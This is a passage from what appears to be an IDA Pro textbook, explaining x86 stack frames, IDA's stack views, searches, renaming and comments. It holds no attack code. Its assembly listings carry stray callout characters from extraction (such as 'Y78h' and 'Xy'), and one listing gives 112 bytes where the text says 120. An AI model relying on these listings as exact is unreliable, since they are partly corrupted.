EBP (extended base pointer) register is typically dedicated for use as a stack frame

pointer. By default, most compilers generate code to use a frame pointer,

though options typically exist for specifying that the stack pointer should be

used instead. GNU gcc/g++, for example, offers the -fomit-frame-pointer

compiler option, which generates functions that do not rely on a fixed-frame

pointer register.

In order to see what the stack frame for demo_stackframe will look like using

a dedicated frame pointer, we need to consider this new prologue code:

Z push ebp ; save the caller's ebp value

[ mov ebp, esp ; make ebp point to the saved register value

\ sub esp, 76 ; allocate space for local variables

The push instruction at Z saves the value of EBP currently being used by

the caller. Functions that adhere to the System V Application Binary Inter-

face for Intel 32-bit Processors2 are allowed to modify the EAX, ECX, and

EDX registers but are required to preserve the caller’s values for all other

registers. Therefore, if we wish to use EBP as a frame pointer, we must save

the current value of EBP before we change it, and we must restore the value

of EBP before we return to the caller. If any other registers need to be saved

on behalf of the caller (ESI or EDI, for example), compilers may choose to

save them at the same time EBP is saved, or they may defer saving them until

2. See http://www.sco.com/developers/devspecs/abi386-4.pdf.

92 Chapter 6

local variables have been allocated. Thus, there is no standard location

within a stack frame for the storage of saved registers.

Once EBP has been saved, it can be changed to point to the current stack

location. This is accomplished by the mov instruction at [, which copies the

current value of the stack pointer into EBP. Finally, as in the non-EBP-based

stack frame, space for local variables is allocated at \. The resulting stack

frame layout is shown in Figure 6-4.

Figure 6-4: An EBP-based stack frame

With a dedicated frame pointer, all variable offsets are computed relative

to the frame pointer register. It is most often (though not necessarily) the

case that positive offsets are used to access function parameters, while nega-

tive offsets are required to access local variables. With a dedicated frame

pointer in use, the stack pointer may be freely changed without affecting the

offset to any variables within the frame. The call to function bar can now be

implemented as follows:

] push dword [ebp-72] ; push y

push dword [ebp-76] ; push z

call bar

add esp, 8 ; cdecl requires caller to clear parameters

The fact that the stack pointer has changed following the push at ] has

no effect on the access to local variable z in the succeeding push.

Finally, the use of a frame pointer necessitates a slightly different epilogue

once the function completes, as the caller’s frame pointer must be restored

prior to returning. Local variables must be cleared from the stack before the

old value of the frame pointer can be retrieved, but this is made easy by the

Variable Offset

y [ebp-72]

buffer [ebp-68]

x [ebp-4]

saved eip [ebp+4]

a [ebp+8]

b[ebp+12]

c [ebp+16]

esp z [ebp-76]

ebp saved ebp [ebp]

local variables

parameters

saved register(s)

Disassembly Navigation 93

fact that the current frame pointer points to the old frame pointer. In x86

programs utilizing EBP as a frame pointer, the following code represents a

typical epilogue:

mov esp, ebp ; clears local variables by reseting esp

pop ebp ; restore the caller's value of ebp

ret ; pop return address to return to the caller

This operation is so common that the x86 architecture offers the leave

instruction as an abbreviated means of accomplishing the same task.

leave ; copies ebp to esp AND then pops into ebp

ret ; pop return address to return to the caller

While the names of registers and instructions used will certainly differ

for other processor architectures, the basic process of building stack frames

will remain the same. Regardless of the architecture, you will want to familiar-

ize yourself with typical prologue and epilogue sequences so that you can

quickly move on to analyzing more interesting code within functions.

IDA Stack Views

Stack frames are clearly a runtime concept; a stack frame can’t exist without

a stack and without a running program. While this is true, it doesn’t mean

that you should ignore the concept of a stack frame when you are performing

static analysis with tools such as IDA. All of the code required to set up stack

frames for each function is present within a binary. Through careful analysis

of this code, we can gain a detailed understanding of the structure of any

function’s stack frame even when the function is not running. In fact, some

of IDA’s most sophisticated analysis is performed specifically to determine

the layout of stack frames for every function that IDA disassembles. During ini-

tial analysis, IDA goes to great lengths to monitor the behavior of the the

stack pointer over the course of a function by making note of every push or

pop operation along with any arithmetic operations that may change the stack

pointer, such as adding or subtracting constant values. The first goal of this

analysis is to determine the exact size of the local variable area allocated to

a function’s stack frame. Additional goals include determining whether a

dedicated frame pointer is in use in a given function (by recognizing a push

ebp/mov ebp, esp sequence, for example) and recognizing all memory ref-

erences to variables within a function’s stack frame. For example, if IDA noted

the following instruction in the body of demo_stackframe

mov eax, [ebp+8]

94 Chapter 6

it would understand that the first argument to the function (a in this case)

is being loaded into the EAX register (refer to Figure 6-4). Through careful

analysis of the stack frame structure, IDA can distinguish between memory

references that access function arguments (those that lie below the saved

return address) and references that access local variables (those that lie above

the saved return address). IDA takes the additional step of determining

which memory locations within a stack frame are directly referenced. For

example, while the stack frame in Figure 6-4 is 96 bytes in size, there are

only seven variables that we are likely to see referenced (four locals and three

parameters).

Understanding the behavior of a function often comes down to under-

standing the types of data that the function manipulates. When reading

a disassembly listing, one of the first opportunities that you will have to

understand the data a function manipulates is to view the breakdown of

the function’s stack frame. IDA offers two views into any function’s stack

frame: a summary view and a detail view. In order to understand these two

views, we will refer to the following version of demo_stackframe, which we

have compiled using gcc.

void demo_stackframe(int a, int b, int c) {

int x = c;

char buffer[64];

int y = b;

int z = 10;

buffer[0] = 'A';

bar(z, y);

}

In this example, local variables x and y are initialized from parameters c

and b, respectively. Local variable z is initialized with the constant value 10,

and the first character in the 64-byte local array, named buffer, is initialized

to the letter 'A'. The corresponding IDA disassembly of this function

appears here.

.text:00401090 ; ========= S U B R O U T I N E ===========================

.text:00401090

.text:00401090 ; Attributes: Xbp-based frame

.text:00401090

.text:00401090 demo_stackframe proc near ; CODE XREF: sub_4010C1+41Èp

.text:00401090

[.text:00401090 var_60 = dword ptr -60h

.text:00401090 var_5C = dword ptr -5Ch

.text:00401090 var_58 = byte ptr -58h

.text:00401090 var_C = dword ptr -0Ch

.text:00401090 arg_4 = dword ptr 0Ch

.text:00401090 arg_8 = dword ptr 10h

.text:00401090

.text:00401090 push ebp

.text:00401091 mov ebp, esp

.text:00401093 sub esp, Y78h

.text:00401096 mov eax, [ebp+\arg_8]

Disassembly Navigation 95

.text:00401099 ]mov [ebp+var_C], eax

.text:0040109C ^mov eax, [ebp+arg_4]

.text:0040109F ^mov [ebp+var_5C], eax

.text:004010A2 _mov [ebp+var_60], 0Ah

.text:004010A9 `mov [ebp+var_58], 41h

.text:004010AD mov eax, [ebp+var_5C]

.text:004010B0 Zmov [esp+4], eax

.text:004010B4 mov eax, [ebp+var_60]

.text:004010B7 Zmov [esp], eax

.text:004010BA call bar

.text:004010BF leave

.text:004010C0 retn

.text:004010C0 demo_stackframe endp

There are many points to cover in this listing as we begin to acquaint

ourselves with IDA’s disassembly notation. We begin at X by noting that IDA

believes this function uses the EBP register as a frame pointer based on analysis

of the function prologue. At Y we learn that gcc has allocated 120 bytes (78h

equates to 120) of local variable space in the stack frame. This includes 8 bytes

for passing the two parameters to bar at Z, but it is still far greater than the

76 bytes we had estimated previously and demonstrates that compilers occa-

sionally pad the local variable space with extra bytes in order to ensure a

particular alignment within the stack frame. Beginning at [, IDA provides a

summary stack view that lists every variable that is directly referenced within

the stack frame, along with the variable’s size and offset distance from the

frame pointer.

IDA assigns names to variables based on their location relative to the

saved return address. Local variables lie above the saved return address,

while function parameters lie below the saved return address. Local variable

names are derived using the var_ prefix joined with a hexadecimal suffix

that indicates the distance, in bytes, that the variable lies above the saved

frame pointer. Local variable var_C, in this case, is a 4-byte (dword) variable

that lies 12 bytes above the saved frame pointer ([ebp-0Ch]). Function param-

eter names are generated using the arg_ prefix combined with a hexadecimal

suffix that represents the relative distance from the topmost parameter.

Thus the topmost 4-byte parameter would be named arg_0, while successive

parameters would be named arg_4, arg_8, arg_C, and so on. In this particular

example arg_0 is not listed because the function makes no use of parameter a.

Because IDA fails to locate any memory reference to [ebp+8] (the location of

the first parameter), arg_0 is not listed in the summary stack view. A quick

scan of the summary stack view reveals that there are many stack locations

that IDA has failed to name because no direct references to those locations

exist in the program code.

NOTE The only stack variables that IDA will automatically generate names for are those that

are directly referenced within a function.

An important difference between IDA’s disassembly listing and the

stack frame analysis that we performed earlier is the fact that nowhere in the

disassembly listing do we see memory references similar to [ebp-12]. Instead,

96 Chapter 6

IDA has replaced all constant offsets with symbolic names corresponding to

the symbols in the stack view and their relative offsets from the stack frame

pointer. This is in keeping with IDA’s goal of generating a higher-level dis-

assembly. It is simply easier to deal with symbolic names than numeric con-

stants. In fact, as we will see later, IDA allows us to change the names of any

stack variable to whatever we wish, making the names that much easier for us

to remember. The summary stack view serves as a map from IDA-generated

names to their corresponding stack frame offsets. For example, where the

memory reference [ebp+arg_8] appears in the disassembly, [ebp+10h] or [ebp+16]

could be used instead. If you prefer numeric offsets, IDA will happily show

them to you. Right-clicking arg_8 at \ yields the context-sensitive menu

shown in Figure 6-5, which contains several options to change the display

format.

Figure 6-5: Selecting an alternate display format

In this example, since we have source code available for comparison,

we can map the IDA-generated variable names back to the names used in

the original source using a variety of clues available in the disassembly.

1. First, demo_stackframe takes three parameters: a, b, and c. These correspond

to variables arg_0, arg_4, and arg_8 respectively (though arg_0 is missing in

the disassembly because it is never referenced).

2. Local variable x is initialized from parameter c. Thus var_C corresponds

to x since it is initialized from arg_8 at ].

3. Similarly, local variable y is initialized from parameter b. Thus, var_5C

corresponds to y since it is initialized from arg_4 at ^.

4. Local variable z corresponds to var_60 since it is initialized with the

value 10 at _.

5. The 64-byte character array buffer begins at var_58 since buffer[0] is

initialized with A (ASCII 0x41) at `.

Disassembly Navigation 97

6. The two arguments for the call to bar are moved into the stack at Z rather

than being pushed onto the stack. This is typical of current versions of

gcc (versions 3.4 and later). IDA recognizes this convention and elects

not to create local variable references for the two items at the top of the

stack frame.

In addition to the summary stack view, IDA offers a detailed stack frame

view in which every byte allocated to a stack frame is accounted for. The

detailed view is accessed by double-clicking any variable name associated with

a given stack frame. Double-clicking var_C in the previous listing would bring

up the stack frame view shown in Figure 6-6 (ESC closes the window).

Figure 6-6: IDA stack frame view

Because the detailed view accounts for every byte in the stack frame, it

occupies significantly more space than the summary view, which lists only

referenced variables. The portion of the stack frame shown in Figure 6-6

spans a total of 32 bytes, which represents only a small portion of the entire

stack frame. Note that no names are assigned to bytes that are not referenced

directly within the function. For example, parameter a, corresponding to

arg_0, was never referenced within demo_stackframe. With no memory reference

to analyze, IDA opts to do nothing with the corresponding bytes in the stack

frame, which occupy offsets +00000008 through +0000000B. On the other hand,

arg_4 was directly referenced at ^ in the disassembly listing, where its contents

were loaded into the 32-bit EAX register. Based on the fact that 32 bits of

data were moved, IDA is able to infer that the arg_4 is a 4-byte quantity and

labels it as such (db defines 1 byte of storage; dw defines 2 bytes of storage, also

called a word; and dd defines 4 bytes of storage, also called a double word).

98 Chapter 6

Two special values shown in Figure 6-6 are “ s” and “ r” (each starts with

a leading space). These pseudo variables are IDA’s special representation of

the saved return address (“ r”) and the saved register value(s) (“ s” represent-

ing only EBP in this example). These values are included in the stack frame

view for completeness, as every byte in the stack frame is accounted for.

Stack frame view offers a detailed look at the inner workings of compilers.

In Figure 6-6 it is clear that the compiler has inserted 8 extra bytes between

the saved frame pointer “ s” and the local variable x (var_C). These bytes

occupy offsets -00000001 through -00000008 in the stack frame. Further, a lit-

tle math performed on the offset associated with each variable listed in the

summary view reveals that the compiler has allocated 76 (rather than 64 per

the source code) bytes to the character buffer at var_58. Unless you happen

to be a compiler writer yourself or are willing to dig deep into the source

code for gcc, all you can do is speculate as to why these extra bytes are allo-

cated in this manner. In most cases we can chalk up the extra bytes to padding

for alignment, and usually the presence of these extra bytes has no impact on

a program’s behavior. After all, if a programmer asks for 64 bytes and is given

76, the program should behave no differently, especially since the program-

mer shouldn’t be using more than the 64 bytes requested. On the other hand,

if you happen to be an exploit developer and learn that it is possible to over-

flow this particular buffer, then you might be very interested in the fact that

nothing interesting can even begin to happen until you have supplied at least

76 bytes, which is the effective size of the buffer as far as the compiler is con-

cerned. In Chapter 8 we will return to the stack frame view and its uses in

dealing with more complex datatypes such as arrays and structures.

Searching the Database

IDA makes it easy to navigate to things that you know about and designs

many of its data displays to summarize specific types of information (names,

strings, imports, and so on), making them easy to find as well. However, what

features are offered to help you conduct more general searches through

your databases? If you take time to review the contents of the Search menu,

you will find a long list of options, the majority of which take you to the next

item in some category. For example, SearchNext Code moves the cursor to

the next location containing an instruction. You may also wish to familiarize

yourself with the options available on the Jump menu. For many of these,

you are presented with a list of locations to choose from. JumpJump to

Function, for example, brings up a list of all functions, allowing you to

quickly choose one and navigate to it. While these canned search features

may often be useful, two types of general-purpose searches are worth more

detailed discussion: text searches and binary searches.

Disassembly Navigation 99

Text Searches

IDA text searches amount to substring searches through the disassem-

bly listing view. Text searches are initiated via SearchText (hotkey: ALT-

T), which opens the dialog shown in Figure 6-7. A number of self-explana-

tory options dictate specific details concerning the search to be performed.

As shown, POSIX-style regular expressions are permitted. The Identifier

search is somewhat misnamed. In reality it restricts the search to find whole

words only and can match any whole word on an assembly line, including

opcode mnemonics or constant values. An Identifier search for 401116 would

fail to find a symbol named loc_401116.

Selecting Find all occurences causes the search results to be opened in a

new window, allowing easy navigation to any single match of the search cri-

teria. Finally, the previous search can be repeated to locate the next match

using CTRL-T or SearchNext Text.

Figure 6-7: Text Search dialog

Binary Searches

If you need to search for specific binary content such as a known sequence of

bytes, then text searches are not the answer. Instead, you need to use IDA’s

binary search facilities. While the text search searches the disassembly window,

the binary search will search only the content portion of the Hex View win-

dow. Either the hex dump or the ASCII dump can be searched, depending on

how the search string is specified. A binary search is initiated using Search

Sequence of Bytes, or ALT-B. Figure 6-8 shows the Binary Search dialog. To

search for a sequence of hex bytes, the search string should be specified as a

space-separated list of two-digit hex values such as CA FE BA BE, which offers

identical behavior as a search for ca fe ba be, despite the availability of a Case-

sensitive option.

To alternatively search for embedded string data (effectively searching

the ASCII dump portion of the Hex View window), you must surround the

search strings with quotes. Use the Unicode strings option to search for the

Unicode version of your search string.

100 Chapter 6

The Case-sensitive option can be a cause of confusion. For string searches

it is fairly straightforward; a search for “hello” will successfully find “HELLO”

if Case-sensitive is not selected. Things get a little interesting if you perform

a hex search and leave Case-sensitive unchecked. If you conduct a case-

insensitive search for E9 41 C3, you may be surprised when your search matches

E9 61 C3. The two strings are considered to match because 0x41 corresponds

to the character A while 0x61 corresponds to a. So, even though you have

specified a hex search, 0x41 is considered equivalent to 0x61 because you

failed to specify a case-sensitive search.

Figure 6-8: Binary Search dialog

NOTE When conducting hex searches, make sure that you specify Case-sensitive if you want to

restrict the search to exact matches. This is important if you are searching for specific

opcode sequences rather than ASCII text.

Searching for subsequent matches for binary data is done using CTRL-B

or SearchNext Sequence of Bytes. Finally, it is not necessary to conduct

your binary searches from within the Hex View window. IDA allows you to

specify binary search criteria while the disassembly view is active, in which

case a successful search will jump the disassembly window to the location

whose underlying bytes match the specified search criteria.

Summary

The intent of this chapter was to provide you with the minimum essential

skills for effectively making your way around a disassembly. The overwhelming

majority of your interactions with IDA will involve the operations that we have

discussed so far. With navigation safely under your belt, the logical next step

is learning how to modify IDA databases to suit your particular needs. In the

next chapter we begin to look at how to make the most basic changes to a

disassembly as a means of adding new knowledge based on our understanding

of a binary’s content and behavior.

JMP

EBP

SUB

DISASSEMBLY MANIPULATION

After navigation, the next most significant

features of IDA are designed to allow you to

modify the disassembly to suit your needs. In

this chapter we will show that because of IDA’s

underlying database nature, changes that you make to

a disassembly are easily propagated to all IDA subviews

to maintain a consistent picture of your disassembly. One of the most powerful

features that IDA offers is the ability to easily manipulate disassemblies to

add new information or reformat a listing to suit your particular needs. IDA

automatically handles operations such as global search and replace when it

makes sense to do so and makes trivial work of reformatting instructions and

data and vice versa, features not available in other disassembly tools.

NOTE Remember: There is no undo in IDA. Keep this in mind as you start manipulating the

database. The closest you’re going to get is saving the database often and reverting to a

recently saved version of the database.

102 Chapter 7

Names and Naming

At this point, we have encountered two categories of names in IDA dis-

assemblies: names associated with virtual addresses (named locations) and

names associated with stack frame variables. In the majority of cases IDA

will automatically generate all of these names according to the guidelines

previously discussed. IDA refers to such automatically generated names as

dummy names.

Unfortunately, these names seldom hint at the intended purpose of a

location or variable and therefore don’t generally add to our understanding of

a program’s behavior. As you begin to analyze any program, one of the first

and most common ways that you will want to manipulate a disassembly listing

is to change default names into more meaningful names. Fortunately, IDA

allows you to easily change any name and handles all of the details of prop-

agating all name changes throughout the entire disassembly. In most cases,

changing a name is as simple as clicking the name you wish to change (this

highlights the name) and using the N hotkey to open a name-change dialog.

Alternatively, right-clicking the name to be changed generally presents a

context-sensitive menu that contains a Rename option, as shown in Figure 6-5.

The name-change process does differ somewhat between stack variables and

named locations, and these differences are detailed in the following sections.

Parameters and Local Variables

Names associated with stack variables are the simplest form of name in a

disassembly listing, primarily because they are not associated with a specific

virtual address and thus can never appear in the Names window. As in most

programming languages, such names are considered to be restricted in

scope based on the function to which a given stack frame belongs. Thus,

every function in a program might have its own stack variable named arg_0,

but no function may have more than one variable named arg_0. The dialog

shown in Figure 7-1 is used to rename a stack variable.

Figure 7-1: Renaming a stack variable

Once a new name is supplied, IDA takes care of changing every occur-

rence of the old name in the context of the current function. Changing the

name of var_5C to y for demo_stackframe would result in the new listing shown

here, with changes at X.

.text:00401090 ; =========== S U B R O U T I N E =========================

.text:00401090

.text:00401090 ; Attributes: bp-based frame

Disassembly Manipulation 103

.text:00401090

.text:00401090 demo_stackframe proc near ; CODE XREF: sub_4010C1+41Èp

.text:00401090

.text:00401090 var_60 = dword ptr -60h

.text:00401090 Xy = dword ptr -5Ch

.text:00401090 var_58 = byte ptr -58h

.text:00401090 var_C = dword ptr -0Ch

.text:00401090 arg_4 = dword ptr 0Ch

.text:00401090 arg_8 = dword ptr 10h

.text:00401090

.text:00401090 push ebp

.text:00401091 mov ebp, esp

.text:00401093 sub esp, 112

.text:00401096 mov eax, [ebp+arg_8]

.text:00401099 mov [ebp+var_C], eax

.text:0040109C mov eax, [ebp+arg_4]

.text:0040109F mov [ebp+y], eax

.text:004010A2 mov [ebp+var_60], 0Ah

.text:004010A9 mov [ebp+var_58], 41h

.text:004010AD mov eax, [ebp+Xy]

.text:004010B0 mov [esp+4], eax

.text:004010B4 mov eax, [ebp+var_60]

.text:004010B7 mov [esp], eax

.text:004010BA call bar

.text:004010BF leave

.text:004010C0 retn

.text:004010C0 demo_stackframe endp

Should you ever wish to revert to the default name for a given variable,

open the renaming dialog and enter a blank name, and IDA will regenerate

the default name for you.

Named Locations

Renaming a named location or adding a name to an unnamed location is

slightly different from changing the name of a stack variable. The process

for accessing the name-change dialog is identical (hotkey N), but things

quickly change. Figure 7-2 shows the renaming dialog associated with named

locations.

This dialog informs you exactly what address you are naming along with

a list of attributes that can be associated with the name. The maximum name

length merely echoes a value from one of IDA’s configuration files (<IDADIR>/

cfg/ida.cfg). You are free to use names longer than this value, which will cause

IDA to complain weakly by informing you that you have exceeded the max-

imum name length and offering to increase the maximum name length for

you. Should you choose to do so, the new maximum name length value will

be enforced (weakly) only in the current database. Any new databases that

you create will continue to be governed by the maximum name length con-

tained in the configuration file.

104 Chapter 7

Figure 7-2: Renaming a location

The following attributes can be associated with any named location:

Local name

A local name is restricted in scope to the current function, so the unique-

ness of local names is enforced only within a given function. Like local

variables, two different functions may contain identical local names,

but a single function cannot contain two local names that are identical.

Named locations that exist outside function boundaries cannot be desig-

nated as local names. These include names that represent function names

as well as global variables. The most common use for local names is to

provide symbolic names for the targets of jumps within a function, such

as those associated with branching control structures.

Include in names list

Selecting this option causes a name to be added to the Names window,

which can make the name easier to find when you wish to return to it.

Autogenerated (dummy) names are never included in the Names window

by default.

Public name

A public name is typically a name that is being exported by a binary

such as a shared library. IDA’s parsers typically discover public names

while parsing file headers during initial loading into the database. You

can force a symbol to be treated as public by selecting this attribute. In

general, this has very little effect on the disassembly other than to cause

public annotations to be added to the name in the disassembly listing

and in the Names window.

Autogenerated name

This attribute appears to have no discernible effect on disassemblies.

Selecting it does not cause IDA to automatically generate a name.

Disassembly Manipulation 105

Weak name

A weak symbol is a specialized form of public symbol utilized only when

no public symbol of the same name is found to override it. Marking a

symbol as weak has some significance to an assembler but little signifi-

cance in an IDA disassembly.

Create name anyway

As discussed previously, no two locations within a function may be given

the same name. Similarly, no two locations outside any function (in the

global scope) may be given the same name. This option is somewhat

confusing, as it behaves differently depending on the type of name you

are attempting to create.

If you are editing a name at the global scope (such as a function name

or global variable) and you attempt to assign a name that is already in

use in the database, IDA will display the conflicting name dialog, shown

in Figure 7-3, offering to automatically generate a unique numeric suffix

to resolve the conflict. This dialog is presented regardless of whether you

have selected the Create name anyway option or not.

If, however, you are editing a local name within a function and you

attempt to assign a name that is already in use, the default behavior is

simply to reject the attempt. If you are determined to use the given name,

you must select Create name anyway in order to force IDA to generate a

unique numeric suffix for the local name. Of course, the simplest way to

resolve any name conflict is to choose a name that is not already in use.

Figure 7-3: Name conflict dialog

A third type of name that is often overlooked is the register name. Within

the boundaries of a function, IDA allows registers to be renamed. It may be

useful to rename a register when a compiler has elected to allocate a variable

in a register rather than on the program stack, and you wish to refer to the

variable using a name more suited to its purpose than EDX, for example.

Use the N hotkey, or right-click the register name and select Rename to open

the register-renaming dialog. When you rename a register you are, in effect,

providing an alias with which to refer to the register for the duration of the

current function (IDA even denotes this alias with an alias = register syntax

at the beginning of the function). IDA takes care of replacing all instances of

the register name with the alias that you provide. It is not possible to rename

a register used in code that does not belong to a function.

106 Chapter 7

Commenting in IDA

Another useful feature in IDA is the ability to embed comments in your

databases. Comments are a particularly useful way to leave notes for yourself

regarding your progress as you analyze a program. In particular, comments

are helpful for describing sequences of assembly language instructions in a

higher-level fashion. For example, you might opt to write comments using C

language statements to summarize the behavior of a particular function. On

subsequent analysis of the function, the comments would serve to refresh your

memory faster than reanalyzing the assembly language statements.

IDA offers several styles of comments, each suited for a different pur-

pose. Comments may be associated with any line of the disassembly listing

using options available from EditComments. Hotkeys or context menus

offer alternate access to IDA’s commenting features. To help you understand

IDA’s commenting features, we refer to the following disassembly of the

function bar:

.text:00401050 ; =============== S U B R O U T I N E =======================================

.text:00401050

.text:00401050 ]; void bar(int j, int k);

.text:00401050 ; Attributes: bp-based frame

.text:00401050

.text:00401050 ^bar proc near ; CODE XREF: demo_stackframe+2A‚p

.text:00401050

.text:00401050 arg_0 = dword ptr 8

.text:00401050 arg_4 = dword ptr 0Ch

.text:00401050

.text:00401050 push ebp

.text:00401051 mov ebp, esp

.text:00401053 sub esp, 8

.text:00401056 \The next three lines test j < k

.text:00401056 mov eax, [ebp+arg_0]

.text:00401059 cmp eax, [ebp+arg_4]

.text:0040105C jge short loc_40106C Z; Repeating comments get echoed at referencing locations

.text:0040105E mov [esp], offset aTheSecondParam [; "The second parameter is larger"

.text:00401065 call printf

.text:0040106A jmp short locret_40108E X; jump to the end of the function

.text:0040106C ; ---------------------------------------------------------------------------

.text:0040106C

.text:0040106C loc_40106C: ; CODE XREF: bar+C·j

.text:0040106C mov eax, [ebp+arg_0] Y; Repeating comments get echoed at referencing locations

.text:0040106F cmp eax, [ebp+arg_4]

.text:00401072 jle short loc_401082

.text:00401074 mov [esp], offset aTheFirstParame [; "The first parameter is larger"

.text:0040107B call printf

.text:00401080 jmp short locret_40108E

.text:00401082 ; ---------------------------------------------------------------------------

.text:00401082

.text:00401082 loc_401082: ; CODE XREF: bar+22·j

.text:00401082 mov [esp], offset aTheParametersA [; "the parameters are equal"

.text:00401089 call printf

.text:0040108E

Disassembly Manipulation 107

.text:0040108E locret_40108E: ; CODE XREF: bar+1A·j

.text:0040108E ; bar+30·j

.text:0040108E leave

.text:0040108F retn

.text:0040108F bar endp

The majority of IDA comments are prefixed with a semicolon to indicate

that the remainder of the line is to be considered a comment. This is similar to

commenting styles used by many assemblers and equates to #-style comments

in many scripting languages or //-style comments in C++.

Regular Comments

The most straightforward comment is the regular comment. Regular comments

are placed at the end of existing assembly lines, as at X in the preceding

listing. Right-click in the right margin of the disassembly or use the colon (:)

hotkey to activate the comment entry dialog. Regular comments will span

multiple lines if you enter multiple lines in the comment entry dialog. Each

of the lines will be indented to line up on the right side of the disassembly.

To edit or delete a comment, you must reopen the comment entry dialog

and edit or delete all of the comment text as appropriate. By default, regular

comments are displayed as blue text.

IDA itself makes extensive use of regular comments. During the analysis

phase, IDA inserts regular comments to describe parameters that are being

pushed for function calls. This occurs only when IDA has parameter name

or type information for the function being called. This information is typi-

cally contained within type libraries, which are discussed in Chapter 8 and

Chapter 13, but also may be entered manually.

Repeatable Comments

A repeatable comment is a comment that is entered once but that may appear

automatically in many locations throughout the disassembly. Location Y

in the previous listing shows a repeatable comment. In a disassembly listing

the default color for repeatable comments is blue, making them indistinguish-

able from regular comments. It is the behavior rather than the appearance

that matters in this case. The behavior of repeatable comments is tied to the

concept of cross-references. When one program location refers to a second

location that contains a repeatable comment, the comment associated with

the second location is echoed at the first location. By default, the echoed

comment appears as gray text, making the repeated comment distinguish-

able from other comments. The hotkey for repeatable comments is the

semicolon (;), making it very easy to confuse repeatable comments and

regular comments.

In the previous listing, note that the comment at Z is identical to the

comment at Y. The comment at Y has been repeated because the instruction

at Z (jge short loc_40106C) refers to the address of Y (0040106C).

108 Chapter 7

A regular comment added at a location that is displaying a repeated

comment overrides the repeated comment so that only the regular comment

will be displayed. If you entered a regular comment at Z, the repeatable

comment inherited from Y would no longer be displayed at Z. If you then

deleted the regular comment at Z, the repeatable comment would once

again be displayed.

A variant form of repeatable comment is associated with strings. When-

ever IDA automatically creates a string variable, a virtual repeatable com-

ment is added at all locations referencing the string variable. We say virtual

because the comment cannot be edited by the user. The content of the

virtual comment is set to the content of the string variable and displayed

throughout the database just as a repeatable comment would be. As a result,

any program locations that refer to the string variable will display the con-

tents of the string variable as a repeated comment. The three comments

annotated [ demonstrate such comments displayed as a result of references

to string variables.

Anterior and Posterior Lines

Anterior and posterior lines are full-line comments that appear either imme-

diately before (anterior) or after (posterior) a given disassembly line. These

comments are the only IDA comments that are not prefixed with the semicolon

character. An example of an anterior line comment appears at \ in the pre-

vious listing. You can distinguish an anterior line from a posterior line by

comparing the address associated with the line to the address associated with

the instruction immediately preceding or following the line.

Function Comments

Function comments allow you to group comments for display at the top of a

function’s disassembly listing. An example of a function comment is shown

at ], where the function prototype has been entered. You enter function

comments by first highlighting the function name at the top of the function

(^) and then adding either a regular or repeatable comment. Repeatable

function comments are echoed at any locations that call the commented

function. IDA will automatically generate function prototype-style comments

when you use the Set Function Type command discussed in Chapter 8.

Basic Code Transformations

In many cases you will be perfectly content with the disassembly listings

that IDA generates. In some cases you won’t. As the types of files that you

analyze diverge farther and farther from ordinary executables generated with

common compilers, you may find that you need to take more control of the

disassembly analysis and display processes. This will be especially true if you

find yourself performing analysis of obfuscated code or files that utilize a

custom (unknown to IDA) file format.

Disassembly Manipulation 109

Code transformations facilitated by IDA include the following:

zConverting data into code

zConverting code into data

zDesignating a sequence of instructions as a function

zChanging the starting or ending address of an existing function

zChanging the display format for instruction operands

The degree to which you utilize these operations depends on a wide

variety of factors and personal preferences. In general, if a binary is very

complex, or if IDA is not familiar with the code sequences generated by the

compiler used to build the binary, then IDA will encounter more problems

during the analysis phase, and you will need to make manual adjustments to

the disassembled code.

Code Display Options

The simplest transformations that you can make to a disassembly listing involve

customizing the amount of information that IDA generates for each disas-

sembly line. Each disassembled line can be considered as a collection of parts

that IDA refers to, not surprisingly, as disassembly line parts. Labels, mnemonics,

and operands are always present in a disassembly line. You can select addi-

tional parts for each disassembly line via OptionsGeneral on the Disassembly

tab, as shown in Figure 7-4.

Figure 7-4: Disassembly line display options

110 Chapter 7

The Display Disassembly Line Parts section in the upper right offers several

options for customizing disassembly lines. For IDA’s text disassembly view,

line prefixes, comments, and repeatable comments are selected by default.

Each item is described here and shown in the listing that follows.

Line prefixes

A line prefix is the section:address portion of each disassembly line.

Deselecting this option causes the line prefix to be removed from each

disassembly line (the default in graph view). To illustrate this option, we

have disabled line prefixes in the next listing.

Stack pointer

IDA performs extensive analysis on each function in order to track

changes to the program stack pointer. This analysis is essential in

understanding the layout of each function’s stack frame. Selecting the

Stack pointer option causes IDA to display the relative change to the

stack pointer throughout the course of each function. This may be

useful in recognizing discrepancies in calling conventions (IDA may

not understand that a particular function uses stdcall, for example) or

unusual manipulations of the stack pointer. Stack pointer tracking is

shown in the column under X. In this example, the stack pointer has

changed by four bytes following the first instruction and a total of 0x7C

bytes following the third instruction. By the time the function completes,

the stack pointer is restored to its original value (a relative change of

zero bytes). Whenever IDA encounters a function return statement and

detects that the stack pointer value is not zero, an error condition is

flagged and the instruction line highlighted in red. In some cases, this

might be a deliberate attempt to frustrate automated analysis. In other

cases, it may be that a compiler utilizes prologues and epilogues that

IDA can’t accurately analyze.

Comments and repeatable comments

Deselecting either of these options inhibits the display of the respective

comment type. This may be useful if you wish to declutter a disassembly

listing.

Auto comments

IDA can automatically comment some instruction types. This can serve

as a reminder as to how particular instructions behave. No comments are

added for trivial instructions such as the x86 mov. The comments at Y

are examples of auto comments. User comments take precedence over

auto comments; in this case if you want to see IDA’s automatic comment

for a line, you’ll have to remove any comments you’ve added (regular or

repeatable).

Bad instruction <BAD> marks

IDA can mark instructions that are legal for the processor but that may

not be recognized by some assemblers. Undocumented (as opposed to

illegal) CPU instructions may fall in this category. In such cases IDA will

disassemble the instruction as a sequence of data bytes and display the

Disassembly Manipulation 111

undocumented instruction as a comment prefaced with <BAD>. The intent

is to generate a disassembly that most assemblers can handle. Refer to

the IDA help file for more information on the use of <BAD> marks.

Number of opcode bytes

Most disassemblers are capable of generating listing files that display

the generated machine language bytes side by side with the assembly

language instructions from which they are derived. IDA allows you to

view the machine language bytes associated with each instruction by

synchronizing a hex display to the disassembly listing display. You can

optionally view machine language bytes mixed with assembly language

instructions by specifying the number of machine language bytes that

IDA should display for each instruction.

This is fairly straightforward when you are disassembling code for

processors that have a fixed instruction size, but it is somewhat more

difficult for variable-length instruction processors such as the x86, for

which instructions may range from one to more than a dozen bytes in

size. Regardless of the instruction length, IDA reserves display space in

the disassembly listing for the number of bytes that you specify here,

pushing the remaining portions of the disassembly line to the right to

accommodate the specified number of opcode bytes. Number of opcode

bytes has been set to 5 in the following disassembly and can be seen in

the columns under Z. The + symbol at [ indicates that the specified

instruction is too long to be fully displayed given the current settings.

000 55 push ebp

004 89 E5 mov ebp, esp

